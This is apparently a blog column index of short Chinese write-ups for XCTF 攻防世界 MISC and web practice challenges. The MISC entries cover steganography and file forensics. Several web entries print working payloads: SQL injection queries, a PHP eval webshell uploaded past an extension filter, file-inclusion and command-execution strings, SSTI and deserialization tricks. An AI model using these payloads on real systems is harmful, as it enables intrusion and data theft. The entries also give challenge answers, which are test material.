CTF
Blank⁰
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
攻防世界MISC进阶区之What-is-this
下载所给附件,我们直接给文件增添后缀.zip,得到一个新的压缩包,打开后得到两张新的图片我们用Stegsolve将两张图片合并,即可得到答案答案:AZADI TOWER原创 2020-08-19 15:26:16 · 242 阅读 · 0 评论 -
攻防世界MISC进阶区之Hear-with-your-Eyes
下载所给附件,用winhex打开,发现是个wav文件,果然修改文件扩展名为.rar会发现有一个音频文件,我们用audacity打开,选择左上方的sound选项,找到其中的频谱图,就会得出答案直接输入flag后边的内容就完成了。...原创 2020-08-19 15:15:43 · 1353 阅读 · 0 评论 -
攻防世界MISC进阶区之reverseMe
打开所给附件,是一张jpg图片我们发现他就是镜像的flag,我们用Photoshop将其打开,图像→图像旋转→水平翻转画布,即可得到flagflag{4f7548f93c7bef1dc6a0542cf04e796e}原创 2020-08-19 14:50:57 · 2447 阅读 · 0 评论 -
攻防世界MISC进阶区之Banmabanma
打开所给附件,看见是个斑马,但我们可以看出来它的身体是一个条形码我们直接利用条形码在线阅读得到其内容:https://online-barcode-reader.inliteresearch.com/结合所给格式,答案为flag{TENSHINE}原创 2020-08-19 14:40:58 · 8490 阅读 · 0 评论 -
攻防世界MISC进阶区之Test-flag-please-ignore
下载所给附件,可以用记事本打开我们看到一串16进制字符,我们通过在线转换即可得到flag。转换网站:https://www.bejson.com/convert/ox2str/flag{hello_world}原创 2020-08-19 14:34:56 · 390 阅读 · 0 评论 -
攻防世界MISC进阶区之János-the-Ripper
下载所给附件,先用winhex打开我们会发现有flag.txt,所以我们给文件增添后缀名.zip发现flag.txt还需要密码,所以我们用ARCHPR暴力破解压缩包密码得到密码fish即可得到flag{ev3n::y0u::bru7us?!}原创 2020-08-17 19:36:56 · 347 阅读 · 0 评论 -
攻防世界MSIC进阶区之can_has_stdio?
下载所给附件,我们可直接用记事本打开,打开后会看见它是由±<>这样符号组成的五角星,再结合题目stdio,估计是c语言编译后的文件,我们可以直接用Brainfuck在线解码,点击Brainfuck to Text即可得到flagflag{esolangs_for_fun_and_profit}...原创 2020-08-17 19:22:19 · 527 阅读 · 0 评论 -
攻防世界MISC进阶区之Training-Stegano-1
下载所给附件打开后是一个bmp文件,我们用winhex打开就可直接看到答案:stegancI原创 2020-08-17 19:14:19 · 371 阅读 · 0 评论 -
攻防世界MISC进阶区之a_good_idea
下载所给附件,将文件后缀改为zip得到一个压缩文件,里边有一个文档和两张图片我们用stegslove将这两张图片合并,我们会找到一个散布红点的图片,我们保存下来用Photoshop打开,将它的曝光度调到最高,我们就会得到一个二维码用qrresearch扫描二维码即可得到答案NCTF{m1sc_1s_very_funny!!!}...原创 2020-08-17 19:06:48 · 450 阅读 · 0 评论 -
攻防世界MISC进阶区之Aesop_secret
下载附件发现是一张动态照片,用Photoshop打开,将9个图层全叠加到一起发现是ISCC,像是一个密钥,将该图片放到winhex中打开,翻到最后边会发现一串加密后的字符我们用ASE在线解密,网址https://www.sojson.com/encrypt_aes.html初次解密:我们进行二次解密:即可得到flag{DugUpADiamondADeepDarkMine}...原创 2020-08-17 18:40:41 · 538 阅读 · 0 评论 -
攻防世界MISC进阶区之embarrass
先下载所给附件,下载完成后有个能用wireshark打开的文件打开后我们在分组字节流里直接搜索字符串flag{就可搜到flagflag{Good_b0y_W3ll_Done}原创 2020-08-14 11:40:55 · 394 阅读 · 0 评论 -
攻防世界MISC进阶区之 pure_color
下载所给附件并打开,发现是一张空白png图片用Stegsolve打开单击Analyse Format→File FormatOR’ ,页面发生了变化,成功绕过用户名检查。找数据库名:-1’ union select 1,2,group_concat(schema_name),4 from information_schema.schemata #数据名为cetc004,表名:-1’ union select 1,2,group_concat(table_nam原创 2020-08-08 18:29:37 · 379 阅读 · 0 评论 -
攻防世界web进阶区之ics-07
题目:点开链接,根据题目打开项目管理页面:点击view-source查看并分析页面源码第一段<?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php');原创 2020-08-08 16:30:13 · 295 阅读 · 0 评论 -
攻防世界we进阶区之upload1
题目:打开链接,先上传一个php文件试试所以,我们新建一个1.txt,写入php一句话: <?php @eval($_REQUEST[‘c’]);?>然后修改文件后缀为.png上传该文件并抓包,修改filename后缀为.php得到upload:upload/1596870603.1.php,打开成功利用中国蚁剑链接,密码即为刚刚所创的png格式的php文件里的c连接成功,打开html文件下的flag.php即可得到flag$flag=“cyberpeace{e54061244aa29c17原创 2020-08-08 15:17:13 · 307 阅读 · 0 评论 -
攻防世界web进阶区之unfinish
题目:进入所给链接,发现是一个登陆界面我们进入注册界面题目为二次注入,参照大佬给出的代码,修改注册url和登录url即可跑出flagimport requestsimport timefrom bs4 import BeautifulSoup #html解析器def getDatabase(): database = '' for i in range(10): data_database = { 'username':"0'+原创 2020-08-08 12:57:29 · 555 阅读 · 0 评论 -
攻防世界web进阶区之bug
题目如图所示:打开题目所给链接,会发现一个登陆界面我们先注册然后登陆,成功点击manage会发现弹出对话框我们返回登录界面还发现一个fiadwd找回密码界面,输入信息,修改密码是用burp抓包抓包修改账户密码重置管理员密码成功。登录账号。再点击manage又弹出一个对话框所以我们在抓的包中添加一个 X-Forwarded-For: 127.0.0.1,发现传参:index.php?module=filemanage&do=???,我们根据题目猜测是upload,传参试试先传参成功,我们选择一个p原创 2020-08-05 12:10:19 · 514 阅读 · 0 评论 -
攻防世界web进阶区之ics-05
打开题目所给链接一个接一个点,发下只有设备维护中心可以点开单机云平台设备中心会发现URL栏有参数?page=index,本题可能存在文件漏洞,采用php协议,用?page=php://filter/read=convert.base64-encode/resource=index.php查看页面源代码解码后分析原码,可以利用在线解码工具解码,分析代码伪造XFF头来登入系统,payload:/index.php?pat=/123/e&rep=system(“find±iname+flag”)&原创 2020-07-31 13:13:23 · 283 阅读 · 0 评论 -
攻防世界web进阶区之web2
点开题目所给链接得到一堆代码题目已经把解法给我们说的很明确了,直接上代码即可得到flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}原创 2020-07-31 10:20:11 · 273 阅读 · 0 评论 -
攻防世界web进阶区之unserialize3
打开题目所给链接得到一堆代码我们要绕过__wakeup这个魔术函数,不然就会被exit掉,我们这里实例化xctf类并对其使用序列化我们将上述的序列化的字符串中的对象属性个数由真实值1修改为2,即O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;},即可得到flag。 cyberpeace{5ddefc2853168af40bc99f8182951fa5}...原创 2020-07-30 16:26:56 · 314 阅读 · 0 评论 -
攻防世界web进阶区之Web_php_include
代码审计后我们会发现存在文件包含漏洞。借助hello参数构建payload:?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>然后借助参数?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>即可得到flagctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}...原创 2020-07-30 12:17:46 · 421 阅读 · 0 评论 -
攻防世界web进阶区之Web_php_unserialize
打开题目链接会得到一堆代码通过 //the secret is in the fl4g.php 这句话我们可以看出来我们所需要的flag在fl4g.php中,我们需要通过反序列化才能得到fl4g.php里边的内容,借鉴下别人的代码通过在线运行工具我们就可以解出所需参数TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==传参 ?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZml原创 2020-07-30 11:22:47 · 492 阅读 · 0 评论 -
攻防世界web进阶区之mfw
打开题目所给链接:首先查看源码,会发现这个但访问之后没什么用。我们点开About会发现它似乎存在git源码泄露,访问/.git/抓包后发现flag.php但对解题没什么作用,我们查看index.php看是否能找到猫腻我们利用assert命令执行来查看flag的内容 payload:?page=1’,‘2’) === false and system(‘cat templates/flag.php’) and strpos('templates/flag ,查看源码即可得到flagcyberpeace{原创 2020-07-25 12:23:44 · 262 阅读 · 0 评论 -
攻防世界web进阶区之CAT
打开题目所给链接:首先我们先试用最具有代表性之一的baidu.com进行检测,但发现无响应来试试127.0.0.1尝试使用管道进行命令执行,输入127.0.0.1 | ls,然而得到的回显是Invalid URL,127.0.0.1 | phpinfo的执行结果也是Invalid URL,看来命令执行时行不通了。payload:?url=@/opt/api/api/settings.py,获取数据库名观察代码发现?/opt/api/database.sqlite3 @会当成绝对路径来读取文件,刚好@字符原创 2020-07-24 21:19:21 · 302 阅读 · 0 评论 -
攻防世界web进阶区之fakebook
首先,打开题目链接:点击join创造一个新用户,创建完成后如图所示: 我们会发现这个blank可以点开,这里存在一个get注入我们会发现/var/www/html/view.php 路径,利用no参数进行注入,在反序列化中构造file文件协议,利用服务端请求伪造漏洞访问服务器上的flag.php文件。Payload:?no=0//union//select 1,2,3,'O:8:“UserInfo”:3:{s:4:“name”;s:1:“1”;s:3:“age”;i:1;s:4:“blog”;s:29:“原创 2020-07-24 20:24:34 · 264 阅读 · 0 评论 -
攻防世界web进阶区之shrine
点开题目所给链接:首先查看它的源代码:我们首先尝试一下注入,在/shrine/路径下注入{{1+1}}:发现果然可以,我们还会发现他把config和self加入了黑名单我们用搜索writeup大法给出的payload为{{get_flashed_messages.globals[‘current_app’].config[‘FLAG’]}}即可得到flagflag{shrine_is_good_ssti}...原创 2020-07-22 18:41:32 · 436 阅读 · 0 评论 -
攻防世界web进阶区之easytornado
点开题目所给链接:会发现有三个链接,查看其他页面:/flag.txt:/welcome.txt:/hints.txt:我们通过第一个页面会发现flag藏于fllllllllllllag之中,所以我们直接输入/fllllllllllllag尝试,跳转页面会报错:此时我们通过error?msg={{ handler.settings }}传递得到cookie secret: 0df815ab-9f5c-4d1a-aa18-b8d0ebaa5edc,/fllllllllllllag的MD5为 3bf9f6cf原创 2020-07-22 18:25:25 · 408 阅读 · 0 评论
分享